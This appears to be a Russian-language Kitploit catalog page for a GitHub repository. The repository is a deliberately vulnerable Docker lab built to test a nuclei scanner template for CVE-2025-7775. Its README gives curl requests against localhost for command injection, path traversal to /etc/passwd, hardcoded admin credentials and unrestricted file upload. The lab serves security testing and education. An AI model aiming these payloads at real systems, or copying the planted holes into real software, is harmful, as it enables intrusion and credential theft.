Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/aaqilyousuf/cve-2025-7775-vulnerable-lab
Сканеры уязвимостейЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubaaqilyousuf/cve-2025-7775-vulnerable-lab

CVE-2025-7775-vulnerable-lab

Уязвимое Docker-приложение, раскрывающее RCE, обход пути, жестко заданные учетные данные и небезопасную загрузку файлов; изолированная лаборатория для тестирования шаблонов сканеров безопасности.

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-7775 Уязвимая лаборатория

Этот репозиторий предоставляет уязвимую среду для тестирования шаблона nuclei для CVE-2025-7775.

Запуск

root@kitploit:~
docker build -t vuln-app .
docker run -d --name vuln-test -p 5000:5000 vuln-app

Тесты уязвимостей

1. Удаленное выполнение команд (RCE)

root@kitploit:~
curl -X POST http://localhost:5000/api/v1/configuration \
  -H "Content-Type: application/json" \
  -d '{"payload":"ls > /tmp/poc_rce.txt"}'

docker exec -it vuln-test cat /tmp/poc_rce.txt

2. Обход пути

root@kitploit:~
curl "http://localhost:5000/download?file=/etc/passwd"

3. Жестко прописанные учетные данные

root@kitploit:~
curl -X POST http://localhost:5000/api/v1/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin", "password":"citrix123"}'

4. Небезопасная загрузка файлов

root@kitploit:~
echo "POC FILE UPLOAD" > test.txt
curl -X POST -F "[email protected]" http://localhost:5000/upload
docker exec -it vuln-test cat /tmp/test.txt

Примечания по использованию

  • Это смоделированная уязвимая среда, предназначенная только для тестирования
  • Используйте только в изолированных лабораторных средах
  • Не предназначено для использования в производственной среде
  • Только для образовательных целей и исследований в области безопасности

Очистка

root@kitploit:~
docker stop vuln-test
docker rm vuln-test
docker rmi vuln-app
Скачать инструмент